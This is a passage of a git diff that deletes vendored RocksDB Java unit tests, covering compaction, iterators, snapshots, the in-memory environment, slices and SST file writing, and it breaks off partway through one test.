-            setLevelZeroFileNumCompactionTrigger(20).
-            setTargetFileSizeBase(L0_FILE_SIZE * 100).
-            setTargetFileSizeMultiplier(1).
-        // To disable auto compaction
-            setMaxBytesForLevelBase(NUM_L0_FILES * L0_FILE_SIZE * 100).
-            setMaxBytesForLevelMultiplier(2).
-            setDisableAutoCompactions(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      // fill database with key/value pairs
-      byte[] value = new byte[VALUE_SIZE];
-      int int_key = 0;
-      for (int round = 0; round < 5; ++round) {
-        int initial_key = int_key;
-        for (int f = 1; f <= NUM_L0_FILES; ++f) {
-          for (int i = 0; i < NUM_KEYS_PER_L0_FILE; ++i) {
-            int_key += KEY_INTERVAL;
-            rand.nextBytes(value);
-
-            db.put(String.format("%020d", int_key).getBytes(),
-                value);
-          }
-          db.flush(new FlushOptions().setWaitForFlush(true));
-          // Make sure we do create one more L0 files.
-          assertThat(
-              db.getProperty("rocksdb.num-files-at-level0")).
-              isEqualTo("" + f);
-        }
-
-        // Compact all L0 files we just created
-        db.compactRange(
-            String.format("%020d", initial_key).getBytes(),
-            String.format("%020d", int_key - 1).getBytes());
-        // Making sure there isn't any L0 files.
-        assertThat(
-            db.getProperty("rocksdb.num-files-at-level0")).
-            isEqualTo("0");
-        // Making sure there are some L1 files.
-        // Here we only use != 0 instead of a specific number
-        // as we don't want the test make any assumption on
-        // how compaction works.
-        assertThat(
-            db.getProperty("rocksdb.num-files-at-level1")).
-            isNotEqualTo("0");
-        // Because we only compacted those keys we issued
-        // in this round, there shouldn't be any L1 -> L2
-        // compaction.  So we expect zero L2 files here.
-        assertThat(
-            db.getProperty("rocksdb.num-files-at-level2")).
-            isEqualTo("0");
-      }
-    }
-  }
-
-  @Test
-  public void compactRangeToLevelColumnFamily()
-      throws RocksDBException {
-    final int NUM_KEYS_PER_L0_FILE = 100;
-    final int KEY_SIZE = 20;
-    final int VALUE_SIZE = 300;
-    final int L0_FILE_SIZE =
-        NUM_KEYS_PER_L0_FILE * (KEY_SIZE + VALUE_SIZE);
-    final int NUM_L0_FILES = 10;
-    final int TEST_SCALE = 5;
-    final int KEY_INTERVAL = 100;
-
-    try (final DBOptions opt = new DBOptions().
-        setCreateIfMissing(true).
-        setCreateMissingColumnFamilies(true);
-         final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions().
-             setCompactionStyle(CompactionStyle.LEVEL).
-             setNumLevels(5).
-             // a slightly bigger write buffer than L0 file
-             // so that we can ensure manual flush always
-             // go before background flush happens.
-                 setWriteBufferSize(L0_FILE_SIZE * 2).
-             // Disable auto L0 -> L1 compaction
-                 setLevelZeroFileNumCompactionTrigger(20).
-                 setTargetFileSizeBase(L0_FILE_SIZE * 100).
-                 setTargetFileSizeMultiplier(1).
-             // To disable auto compaction
-                 setMaxBytesForLevelBase(NUM_L0_FILES * L0_FILE_SIZE * 100).
-                 setMaxBytesForLevelMultiplier(2).
-                 setDisableAutoCompactions(true)
-    ) {
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts)
-          );
-
-      final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-      // open database
-      try (final RocksDB db = RocksDB.open(opt,
-          dbFolder.getRoot().getAbsolutePath(),
-          columnFamilyDescriptors,
-          columnFamilyHandles)) {
-        try {
-          // fill database with key/value pairs
-          byte[] value = new byte[VALUE_SIZE];
-          int int_key = 0;
-          for (int round = 0; round < 5; ++round) {
-            int initial_key = int_key;
-            for (int f = 1; f <= NUM_L0_FILES; ++f) {
-              for (int i = 0; i < NUM_KEYS_PER_L0_FILE; ++i) {
-                int_key += KEY_INTERVAL;
-                rand.nextBytes(value);
-
-                db.put(columnFamilyHandles.get(1),
-                    String.format("%020d", int_key).getBytes(),
-                    value);
-              }
-              db.flush(new FlushOptions().setWaitForFlush(true),
-                  columnFamilyHandles.get(1));
-              // Make sure we do create one more L0 files.
-              assertThat(
-                  db.getProperty(columnFamilyHandles.get(1),
-                      "rocksdb.num-files-at-level0")).
-                  isEqualTo("" + f);
-            }
-
-            // Compact all L0 files we just created
-            db.compactRange(
-                columnFamilyHandles.get(1),
-                String.format("%020d", initial_key).getBytes(),
-                String.format("%020d", int_key - 1).getBytes());
-            // Making sure there isn't any L0 files.
-            assertThat(
-                db.getProperty(columnFamilyHandles.get(1),
-                    "rocksdb.num-files-at-level0")).
-                isEqualTo("0");
-            // Making sure there are some L1 files.
-            // Here we only use != 0 instead of a specific number
-            // as we don't want the test make any assumption on
-            // how compaction works.
-            assertThat(
-                db.getProperty(columnFamilyHandles.get(1),
-                    "rocksdb.num-files-at-level1")).
-                isNotEqualTo("0");
-            // Because we only compacted those keys we issued
-            // in this round, there shouldn't be any L1 -> L2
-            // compaction.  So we expect zero L2 files here.
-            assertThat(
-                db.getProperty(columnFamilyHandles.get(1),
-                    "rocksdb.num-files-at-level2")).
-                isEqualTo("0");
-          }
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void pauseContinueBackgroundWork() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      db.pauseBackgroundWork();
-      db.continueBackgroundWork();
-      db.pauseBackgroundWork();
-      db.continueBackgroundWork();
-    }
-  }
-
-  @Test
-  public void enableDisableFileDeletions() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      db.disableFileDeletions();
-      db.enableFileDeletions(false);
-      db.disableFileDeletions();
-      db.enableFileDeletions(true);
-    }
-  }
-
-  @Test
-  public void setOptions() throws RocksDBException {
-    try (final DBOptions options = new DBOptions()
-             .setCreateIfMissing(true)
-             .setCreateMissingColumnFamilies(true);
-         final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions()
-             .setWriteBufferSize(4096)) {
-
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts));
-
-      // open database
-      final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath(), columnFamilyDescriptors, columnFamilyHandles)) {
-        try {
-          final MutableColumnFamilyOptions mutableOptions =
-              MutableColumnFamilyOptions.builder()
-                  .setWriteBufferSize(2048)
-                  .build();
-
-          db.setOptions(columnFamilyHandles.get(1), mutableOptions);
-
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksEnvTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksEnvTest.java
deleted file mode 100644
index dfb7961..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksEnvTest.java
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class RocksEnvTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void rocksEnv() {
-    try (final Env rocksEnv = RocksEnv.getDefault()) {
-      rocksEnv.setBackgroundThreads(5);
-      // default rocksenv will always return zero for flush pool
-      // no matter what was set via setBackgroundThreads
-      assertThat(rocksEnv.getThreadPoolQueueLen(RocksEnv.FLUSH_POOL)).
-          isEqualTo(0);
-      rocksEnv.setBackgroundThreads(5, RocksEnv.FLUSH_POOL);
-      // default rocksenv will always return zero for flush pool
-      // no matter what was set via setBackgroundThreads
-      assertThat(rocksEnv.getThreadPoolQueueLen(RocksEnv.FLUSH_POOL)).
-          isEqualTo(0);
-      rocksEnv.setBackgroundThreads(5, RocksEnv.COMPACTION_POOL);
-      // default rocksenv will always return zero for compaction pool
-      // no matter what was set via setBackgroundThreads
-      assertThat(rocksEnv.getThreadPoolQueueLen(RocksEnv.COMPACTION_POOL)).
-          isEqualTo(0);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksIteratorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksIteratorTest.java
deleted file mode 100644
index 982dab4..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksIteratorTest.java
+++ /dev/null
@@ -1,58 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class RocksIteratorTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void rocksIterator() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key1".getBytes(), "value1".getBytes());
-      db.put("key2".getBytes(), "value2".getBytes());
-
-      try (final RocksIterator iterator = db.newIterator()) {
-        iterator.seekToFirst();
-        assertThat(iterator.isValid()).isTrue();
-        assertThat(iterator.key()).isEqualTo("key1".getBytes());
-        assertThat(iterator.value()).isEqualTo("value1".getBytes());
-        iterator.next();
-        assertThat(iterator.isValid()).isTrue();
-        assertThat(iterator.key()).isEqualTo("key2".getBytes());
-        assertThat(iterator.value()).isEqualTo("value2".getBytes());
-        iterator.next();
-        assertThat(iterator.isValid()).isFalse();
-        iterator.seekToLast();
-        iterator.prev();
-        assertThat(iterator.isValid()).isTrue();
-        assertThat(iterator.key()).isEqualTo("key1".getBytes());
-        assertThat(iterator.value()).isEqualTo("value1".getBytes());
-        iterator.seekToFirst();
-        iterator.seekToLast();
-        assertThat(iterator.isValid()).isTrue();
-        assertThat(iterator.key()).isEqualTo("key2".getBytes());
-        assertThat(iterator.value()).isEqualTo("value2".getBytes());
-        iterator.status();
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemEnvTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemEnvTest.java
deleted file mode 100644
index 04fae2e..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemEnvTest.java
+++ /dev/null
@@ -1,148 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class RocksMemEnvTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void memEnvFillAndReopen() throws RocksDBException {
-
-    final byte[][] keys = {
-        "aaa".getBytes(),
-        "bbb".getBytes(),
-        "ccc".getBytes()
-    };
-
-    final byte[][] values = {
-        "foo".getBytes(),
-        "bar".getBytes(),
-        "baz".getBytes()
-    };
-
-    try (final Env env = new RocksMemEnv();
-         final Options options = new Options()
-             .setCreateIfMissing(true)
-             .setEnv(env);
-         final FlushOptions flushOptions = new FlushOptions()
-             .setWaitForFlush(true);
-    ) {
-      try (final RocksDB db = RocksDB.open(options, "dir/db")) {
-        // write key/value pairs using MemEnv
-        for (int i = 0; i < keys.length; i++) {
-          db.put(keys[i], values[i]);
-        }
-
-        // read key/value pairs using MemEnv
-        for (int i = 0; i < keys.length; i++) {
-          assertThat(db.get(keys[i])).isEqualTo(values[i]);
-        }
-
-        // Check iterator access
-        try (final RocksIterator iterator = db.newIterator()) {
-          iterator.seekToFirst();
-          for (int i = 0; i < keys.length; i++) {
-            assertThat(iterator.isValid()).isTrue();
-            assertThat(iterator.key()).isEqualTo(keys[i]);
-            assertThat(iterator.value()).isEqualTo(values[i]);
-            iterator.next();
-          }
-          // reached end of database
-          assertThat(iterator.isValid()).isFalse();
-        }
-
-        // flush
-        db.flush(flushOptions);
-
-        // read key/value pairs after flush using MemEnv
-        for (int i = 0; i < keys.length; i++) {
-          assertThat(db.get(keys[i])).isEqualTo(values[i]);
-        }
-      }
-
-      options.setCreateIfMissing(false);
-
-      // After reopen the values shall still be in the mem env.
-      // as long as the env is not freed.
-      try (final RocksDB db = RocksDB.open(options, "dir/db")) {
-        // read key/value pairs using MemEnv
-        for (int i = 0; i < keys.length; i++) {
-          assertThat(db.get(keys[i])).isEqualTo(values[i]);
-        }
-      }
-    }
-  }
-
-  @Test
-  public void multipleDatabaseInstances() throws RocksDBException {
-    // db - keys
-    final byte[][] keys = {
-        "aaa".getBytes(),
-        "bbb".getBytes(),
-        "ccc".getBytes()
-    };
-    // otherDb - keys
-    final byte[][] otherKeys = {
-        "111".getBytes(),
-        "222".getBytes(),
-        "333".getBytes()
-    };
-    // values
-    final byte[][] values = {
-        "foo".getBytes(),
-        "bar".getBytes(),
-        "baz".getBytes()
-    };
-
-    try (final Env env = new RocksMemEnv();
-         final Options options = new Options()
-             .setCreateIfMissing(true)
-             .setEnv(env);
-         final RocksDB db = RocksDB.open(options, "dir/db");
-         final RocksDB otherDb = RocksDB.open(options, "dir/otherDb")
-    ) {
-      // write key/value pairs using MemEnv
-      // to db and to otherDb.
-      for (int i = 0; i < keys.length; i++) {
-        db.put(keys[i], values[i]);
-        otherDb.put(otherKeys[i], values[i]);
-      }
-
-      // verify key/value pairs after flush using MemEnv
-      for (int i = 0; i < keys.length; i++) {
-        // verify db
-        assertThat(db.get(otherKeys[i])).isNull();
-        assertThat(db.get(keys[i])).isEqualTo(values[i]);
-
-        // verify otherDb
-        assertThat(otherDb.get(keys[i])).isNull();
-        assertThat(otherDb.get(otherKeys[i])).isEqualTo(values[i]);
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void createIfMissingFalse() throws RocksDBException {
-    try (final Env env = new RocksMemEnv();
-         final Options options = new Options()
-             .setCreateIfMissing(false)
-             .setEnv(env);
-         final RocksDB db = RocksDB.open(options, "db/dir")) {
-      // shall throw an exception because db dir does not
-      // exist.
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemoryResource.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemoryResource.java
deleted file mode 100644
index 6fd1c7e..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemoryResource.java
+++ /dev/null
@@ -1,24 +0,0 @@
-package org.rocksdb;
-
-import org.junit.rules.ExternalResource;
-
-/**
- * Resource to trigger garbage collection after each test
- * run.
- *
- * @deprecated Will be removed with the implementation of
- * {@link RocksObject#finalize()}
- */
-@Deprecated
-public class RocksMemoryResource extends ExternalResource {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Override
-  protected void after() {
-    System.gc();
-    System.runFinalization();
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SliceTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SliceTest.java
deleted file mode 100644
index 7ee656c..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SliceTest.java
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class SliceTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void slice() {
-    try (final Slice slice = new Slice("testSlice")) {
-      assertThat(slice.empty()).isFalse();
-      assertThat(slice.size()).isEqualTo(9);
-      assertThat(slice.data()).isEqualTo("testSlice".getBytes());
-    }
-
-    try (final Slice otherSlice = new Slice("otherSlice".getBytes())) {
-      assertThat(otherSlice.data()).isEqualTo("otherSlice".getBytes());
-    }
-
-    try (final Slice thirdSlice = new Slice("otherSlice".getBytes(), 5)) {
-      assertThat(thirdSlice.data()).isEqualTo("Slice".getBytes());
-    }
-  }
-
-  @Test
-  public void sliceClear() {
-    try (final Slice slice = new Slice("abc")) {
-      assertThat(slice.toString()).isEqualTo("abc");
-      slice.clear();
-      assertThat(slice.toString()).isEmpty();
-      slice.clear();  // make sure we don't double-free
-    }
-  }
-
-  @Test
-  public void sliceRemovePrefix() {
-    try (final Slice slice = new Slice("abc")) {
-      assertThat(slice.toString()).isEqualTo("abc");
-      slice.removePrefix(1);
-      assertThat(slice.toString()).isEqualTo("bc");
-    }
-  }
-
-  @Test
-  public void sliceEquals() {
-    try (final Slice slice = new Slice("abc");
-         final Slice slice2 = new Slice("abc")) {
-      assertThat(slice.equals(slice2)).isTrue();
-      assertThat(slice.hashCode() == slice2.hashCode()).isTrue();
-    }
-  }
-
-  @Test
-  public void sliceStartWith() {
-    try (final Slice slice = new Slice("matchpoint");
-         final Slice match = new Slice("mat");
-         final Slice noMatch = new Slice("nomatch")) {
-      assertThat(slice.startsWith(match)).isTrue();
-      assertThat(slice.startsWith(noMatch)).isFalse();
-    }
-  }
-
-  @Test
-  public void sliceToString() {
-    try (final Slice slice = new Slice("stringTest")) {
-      assertThat(slice.toString()).isEqualTo("stringTest");
-      assertThat(slice.toString(true)).isNotEqualTo("");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SnapshotTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SnapshotTest.java
deleted file mode 100644
index de48c89..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SnapshotTest.java
+++ /dev/null
@@ -1,169 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class SnapshotTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void snapshots() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key".getBytes(), "value".getBytes());
-      // Get new Snapshot of database
-      try (final Snapshot snapshot = db.getSnapshot()) {
-        assertThat(snapshot.getSequenceNumber()).isGreaterThan(0);
-        assertThat(snapshot.getSequenceNumber()).isEqualTo(1);
-        try (final ReadOptions readOptions = new ReadOptions()) {
-          // set snapshot in ReadOptions
-          readOptions.setSnapshot(snapshot);
-
-          // retrieve key value pair
-          assertThat(new String(db.get("key".getBytes()))).
-              isEqualTo("value");
-          // retrieve key value pair created before
-          // the snapshot was made
-          assertThat(new String(db.get(readOptions,
-              "key".getBytes()))).isEqualTo("value");
-          // add new key/value pair
-          db.put("newkey".getBytes(), "newvalue".getBytes());
-          // using no snapshot the latest db entries
-          // will be taken into account
-          assertThat(new String(db.get("newkey".getBytes()))).
-              isEqualTo("newvalue");
-          // snapshopot was created before newkey
-          assertThat(db.get(readOptions, "newkey".getBytes())).
-              isNull();
-          // Retrieve snapshot from read options
-          try (final Snapshot sameSnapshot = readOptions.snapshot()) {
-            readOptions.setSnapshot(sameSnapshot);
-            // results must be the same with new Snapshot
-            // instance using the same native pointer
-            assertThat(new String(db.get(readOptions,
-                "key".getBytes()))).isEqualTo("value");
-            // update key value pair to newvalue
-            db.put("key".getBytes(), "newvalue".getBytes());
-            // read with previously created snapshot will
-            // read previous version of key value pair
-            assertThat(new String(db.get(readOptions,
-                "key".getBytes()))).isEqualTo("value");
-            // read for newkey using the snapshot must be
-            // null
-            assertThat(db.get(readOptions, "newkey".getBytes())).
-                isNull();
-            // setting null to snapshot in ReadOptions leads
-            // to no Snapshot being used.
-            readOptions.setSnapshot(null);
-            assertThat(new String(db.get(readOptions,
-                "newkey".getBytes()))).isEqualTo("newvalue");
-            // release Snapshot
-            db.releaseSnapshot(snapshot);
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void iteratorWithSnapshot() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key".getBytes(), "value".getBytes());
-
-      // Get new Snapshot of database
-      // set snapshot in ReadOptions
-      try (final Snapshot snapshot = db.getSnapshot();
-           final ReadOptions readOptions =
-               new ReadOptions().setSnapshot(snapshot)) {
-        db.put("key2".getBytes(), "value2".getBytes());
-
-        // iterate over current state of db
-        try (final RocksIterator iterator = db.newIterator()) {
-          iterator.seekToFirst();
-          assertThat(iterator.isValid()).isTrue();
-          assertThat(iterator.key()).isEqualTo("key".getBytes());
-          iterator.next();
-          assertThat(iterator.isValid()).isTrue();
-          assertThat(iterator.key()).isEqualTo("key2".getBytes());
-          iterator.next();
-          assertThat(iterator.isValid()).isFalse();
-        }
-
-        // iterate using a snapshot
-        try (final RocksIterator snapshotIterator =
-                 db.newIterator(readOptions)) {
-          snapshotIterator.seekToFirst();
-          assertThat(snapshotIterator.isValid()).isTrue();
-          assertThat(snapshotIterator.key()).isEqualTo("key".getBytes());
-          snapshotIterator.next();
-          assertThat(snapshotIterator.isValid()).isFalse();
-        }
-
-        // release Snapshot
-        db.releaseSnapshot(snapshot);
-      }
-    }
-  }
-
-  @Test
-  public void iteratorWithSnapshotOnColumnFamily() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      db.put("key".getBytes(), "value".getBytes());
-
-      // Get new Snapshot of database
-      // set snapshot in ReadOptions
-      try (final Snapshot snapshot = db.getSnapshot();
-           final ReadOptions readOptions = new ReadOptions()
-               .setSnapshot(snapshot)) {
-        db.put("key2".getBytes(), "value2".getBytes());
-
-        // iterate over current state of column family
-        try (final RocksIterator iterator = db.newIterator(
-            db.getDefaultColumnFamily())) {
-          iterator.seekToFirst();
-          assertThat(iterator.isValid()).isTrue();
-          assertThat(iterator.key()).isEqualTo("key".getBytes());
-          iterator.next();
-          assertThat(iterator.isValid()).isTrue();
-          assertThat(iterator.key()).isEqualTo("key2".getBytes());
-          iterator.next();
-          assertThat(iterator.isValid()).isFalse();
-        }
-
-        // iterate using a snapshot on default column family
-        try (final RocksIterator snapshotIterator = db.newIterator(
-            db.getDefaultColumnFamily(), readOptions)) {
-          snapshotIterator.seekToFirst();
-          assertThat(snapshotIterator.isValid()).isTrue();
-          assertThat(snapshotIterator.key()).isEqualTo("key".getBytes());
-          snapshotIterator.next();
-          assertThat(snapshotIterator.isValid()).isFalse();
-
-          // release Snapshot
-          db.releaseSnapshot(snapshot);
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SstFileWriterTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SstFileWriterTest.java
deleted file mode 100644
index 6261210..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SstFileWriterTest.java
+++ /dev/null
@@ -1,226 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-import org.rocksdb.util.BytewiseComparator;
-
-import java.io.File;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.junit.Assert.fail;
-
-public class SstFileWriterTest {
-  private static final String SST_FILE_NAME = "test.sst";
-  private static final String DB_DIRECTORY_NAME = "test_db";
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource
-      = new RocksMemoryResource();
-
-  @Rule public TemporaryFolder parentFolder = new TemporaryFolder();
-
-  enum OpType { PUT, PUT_BYTES, MERGE, MERGE_BYTES, DELETE, DELETE_BYTES}
-
-  class KeyValueWithOp {
-    KeyValueWithOp(String key, String value, OpType opType) {
-      this.key = key;
-      this.value = value;
-      this.opType = opType;
-    }
-
-    String getKey() {
-      return key;
-    }
-
-    String getValue() {
-      return value;
-    }
-
-    OpType getOpType() {
-      return opType;
-    }
-
-    private String key;
-    private String value;
-    private OpType opType;
-  };
-
-  private File newSstFile(final List<KeyValueWithOp> keyValues,
-      boolean useJavaBytewiseComparator) throws IOException, RocksDBException {
-    final EnvOptions envOptions = new EnvOptions();
-    final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-    final Options options = new Options().setMergeOperator(stringAppendOperator);
-    SstFileWriter sstFileWriter = null;
-    ComparatorOptions comparatorOptions = null;
-    BytewiseComparator comparator = null;
-    if (useJavaBytewiseComparator) {
-      comparatorOptions = new ComparatorOptions();
-      comparator = new BytewiseComparator(comparatorOptions);
-      options.setComparator(comparator);
-      sstFileWriter = new SstFileWriter(envOptions, options, comparator);
-    } else {
-      sstFileWriter = new SstFileWriter(envOptions, options);
-    }
-
-    final File sstFile = parentFolder.newFile(SST_FILE_NAME);
-    try {
-      sstFileWriter.open(sstFile.getAbsolutePath());
-      for (KeyValueWithOp keyValue : keyValues) {
-        Slice keySlice = new Slice(keyValue.getKey());
-        Slice valueSlice = new Slice(keyValue.getValue());
-        byte[] keyBytes = keyValue.getKey().getBytes();
-        byte[] valueBytes = keyValue.getValue().getBytes();
-        switch (keyValue.getOpType()) {
-          case PUT:
-            sstFileWriter.put(keySlice, valueSlice);
-            break;
-          case PUT_BYTES:
-            sstFileWriter.put(keyBytes, valueBytes);
-            break;
-          case MERGE:
-            sstFileWriter.merge(keySlice, valueSlice);
-            break;
-          case MERGE_BYTES:
-            sstFileWriter.merge(keyBytes, valueBytes);
-            break;
-          case DELETE:
-            sstFileWriter.delete(keySlice);
-            break;
-          case DELETE_BYTES:
-            sstFileWriter.delete(keyBytes);
-            break;
-          default:
-            fail("Unsupported op type");
-        }
-        keySlice.close();
-        valueSlice.close();
-      }
-      sstFileWriter.finish();
-    } finally {
-      assertThat(sstFileWriter).isNotNull();
-      sstFileWriter.close();
-      options.close();
-      envOptions.close();
-      if (comparatorOptions != null) {
-        comparatorOptions.close();
-      }
-      if (comparator != null) {
-        comparator.close();
-      }
-    }
-    return sstFile;
-  }
-
-  @Test
-  public void generateSstFileWithJavaComparator()
-      throws RocksDBException, IOException {
-    final List<KeyValueWithOp> keyValues = new ArrayList<>();
-    keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key3", "value3", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key4", "value4", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key5", "", OpType.DELETE));
-
-    newSstFile(keyValues, true);
-  }
-
-  @Test
-  public void generateSstFileWithNativeComparator()
-      throws RocksDBException, IOException {
-    final List<KeyValueWithOp> keyValues = new ArrayList<>();
-    keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key3", "value3", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key4", "value4", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key5", "", OpType.DELETE));
-
-    newSstFile(keyValues, false);
-  }
-
-  @Test
-  public void ingestSstFile() throws RocksDBException, IOException {
-    final List<KeyValueWithOp> keyValues = new ArrayList<>();
-    keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key3", "value3", OpType.PUT_BYTES));
-    keyValues.add(new KeyValueWithOp("key4", "value4", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key5", "value5", OpType.MERGE_BYTES));
-    keyValues.add(new KeyValueWithOp("key6", "", OpType.DELETE));
